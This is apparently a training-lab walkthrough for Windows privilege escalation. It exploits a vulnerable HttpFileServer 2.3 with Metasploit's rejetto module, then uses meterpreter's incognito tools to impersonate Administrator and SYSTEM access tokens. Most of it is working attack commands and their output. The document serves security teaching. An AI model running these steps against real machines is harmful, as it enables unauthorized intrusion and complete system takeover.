🔬Access Token
Lab 1
🔬 Privilege Escalation: Impersonate
Target IP:
10.4.22.75
Access Token impersonation
Enumeration
nmap 10.4.22.75
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Determine the version information of the web server on port
80
nmap -sV -p 80 10.4.22.75
80/tcp open http HttpFileServer httpd 2.3
Without using
nmap
, thehttp
server version can be checked in a browser by opening the linkhttp://10.4.22.75/
Exploitation
searchsploit hfs
msfconsole -q
Set the target IP as GLOBAL RHOSTS variable
setg RHOSTS 10.4.22.75
search rejetto
use exploit/windows/http/rejetto_hfs_exec
options
exploit
sysinfo
Computer : ATTACKDEFENSE
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Meterpreter : x86/windows
Migrate current x86
meterpreter
session to a x64 process
pgrep explorer
migrate 3640
[*] Migrating from 1692 to 3640...
[-] core_migrate: Operation failed: Access is denied.
getuid
Server username: NT AUTHORITY\LOCAL SERVICE
# LOCAL SERVICE account is by default unprivileged
getprivs
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeSystemtimePrivilege
SeTimeZonePrivilege
This
meterpreter
session (with this particular user account) can be utilized to impersonate other access tokens available.
Privilege Escalation
Access Token Impersonation
load incognito
# if the session dies, run the exploit again
list_tokens -u
Delegation Tokens Available # Interactive Logon
========================================
ATTACKDEFENSE\Administrator
NT AUTHORITY\LOCAL SERVICE
Impersonation Tokens Available # Non-Interactive Logon
========================================
No tokens available

ATTACKDEFENSE\Administrator
account access token would provide elevated privileges
impersonate_token "ATTACKDEFENSE\Administrator"
getuid
Server username: ATTACKDEFENSE\Administrator
getprivs
[-] stdapi_sys_config_getprivs: Operation failed: Access is denied.
pgrep explorer
migrate 3640
getprivs

Listing tokens with this account, there can be additional available tokens
list_tokens -u
Delegation Tokens Available
========================================
ATTACKDEFENSE\Administrator
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\SYSTEM
Window Manager\DWM-1
Impersonation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
can be impersonated, getting the privileges associated with its access token
impersonate_token "NT AUTHORITY\SYSTEM"
In the case of no Delegation or Impersonation tokens found, the
Potato Attack
can be used to get or generate aNT AUTHORITY/SYSTEM
access token, impersonating it and obtain privileges associated to it.Get the flag of the lab:
cd C:\\Users\\Administrator\\Desktop\\
Last updated
Was this helpful?